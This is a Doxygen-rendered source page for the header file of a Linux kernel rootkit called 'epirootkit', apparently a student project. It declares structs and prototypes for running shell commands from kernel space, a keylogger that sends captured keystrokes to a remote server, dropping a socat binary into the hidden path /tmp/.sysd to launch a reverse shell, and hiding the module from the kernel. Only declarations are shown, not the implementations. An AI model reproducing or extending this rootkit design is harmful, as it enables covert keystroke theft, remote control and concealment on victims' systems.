d0/dcb/epirootkit_8h_source.html

#ifndef EPIROOTKIT_H

#define EPIROOTKIT_H


#include <linux/fs.h>

#include <linux/ftrace.h>

#include <linux/init.h>

#include <linux/kallsyms.h>

#include <linux/kernel.h>

#include <linux/kprobes.h>

#include <linux/sched.h>

#include <linux/slab.h>

#include <linux/spinlock.h>

#include <linux/types.h>

#include <linux/uaccess.h>


#include "network.h"


// Used by exec_str_as_command

// to store the return code of the command


struct exec_code_stds {

    int code;

    char *std_out;

    char *std_err;

};


struct command {

    char *cmd_name;

    unsigned cmd_name_size;

    char *cmd_desc;

    unsigned cmd_desc_size;

    int (*cmd_handler)(char *args, enum Protocol protocol);

};


// Function prototypes


// exec_cmd.c

#define exec_str_as_command(user_cmd, catch_stds) exec_str_as_command_with_timeout(user_cmd, catch_stds, USERLAND_CMD_TIMEOUT)  // Execute a command string in user mode with a default timeout

#define exec_str_as_command_no_timeout(user_cmd, catch_stds) exec_str_as_command_with_timeout(user_cmd, catch_stds, 0)          // Execute a command string in user mode without timeout

int exec_str_as_command_with_timeout(char *user_cmd, bool catch_stds, int timeout);                                             // Execute a command string in user mode


// epikeylog.c

int epikeylog_init(void);                                   // Initialize the keylogger

int epikeylog_send_to_server(void);                         // Send keylogger content to the server

int epikeylog_exit(void);                                   // Cleanup function for the keylogger


// socat.c

int drop_socat_binaire(void);                               // Drop the socat binary in /tmp/.sysd

int remove_socat_binaire(void);                             // Remove the socat binary from /tmp/.sysd

int launch_reverse_shell(char *args);                       // Launch the reverse shell with socat


// hider.c

int hide_module(void);                                      // Hide the module from the kernel

int unhide_module(void);                                    // Unhide the module in the kernel


#endif // EPIROOTKIT_H

Protocol
Protocol
Definition config.h:28

exec_str_as_command_with_timeout
int exec_str_as_command_with_timeout(char *user_cmd, bool catch_stds, int timeout)
Definition userland.c:139

epikeylog_send_to_server
int epikeylog_send_to_server(void)
Handles sending the keylogger buffer content to the remote server.
Definition epikeylog.c:245

epikeylog_init
int epikeylog_init(void)
Initializes the keylogger module.
Definition epikeylog.c:325

hide_module
int hide_module(void)
Definition ghost.c:7

drop_socat_binaire
int drop_socat_binaire(void)
Definition socat.c:32

remove_socat_binaire
int remove_socat_binaire(void)
Definition socat.c:72

unhide_module
int unhide_module(void)
Definition ghost.c:24

launch_reverse_shell
int launch_reverse_shell(char *args)
Definition socat.c:83

epikeylog_exit
int epikeylog_exit(void)
Exits the keylogger module, unregisters the notifier, and cleans up.
Definition epikeylog.c:363

network.h

command
Definition epirootkit.h:26

command::cmd_desc_size
unsigned cmd_desc_size
Definition epirootkit.h:30

command::cmd_desc
char * cmd_desc
Definition epirootkit.h:29

command::cmd_name
char * cmd_name
Definition epirootkit.h:27

command::cmd_name_size
unsigned cmd_name_size
Definition epirootkit.h:28

command::cmd_handler
int(* cmd_handler)(char *args, enum Protocol protocol)
Definition epirootkit.h:31

exec_code_stds
Definition epirootkit.h:20

exec_code_stds::std_err
char * std_err
Definition epirootkit.h:23

exec_code_stds::code
int code
Definition epirootkit.h:21

exec_code_stds::std_out
char * std_out
Definition epirootkit.h:22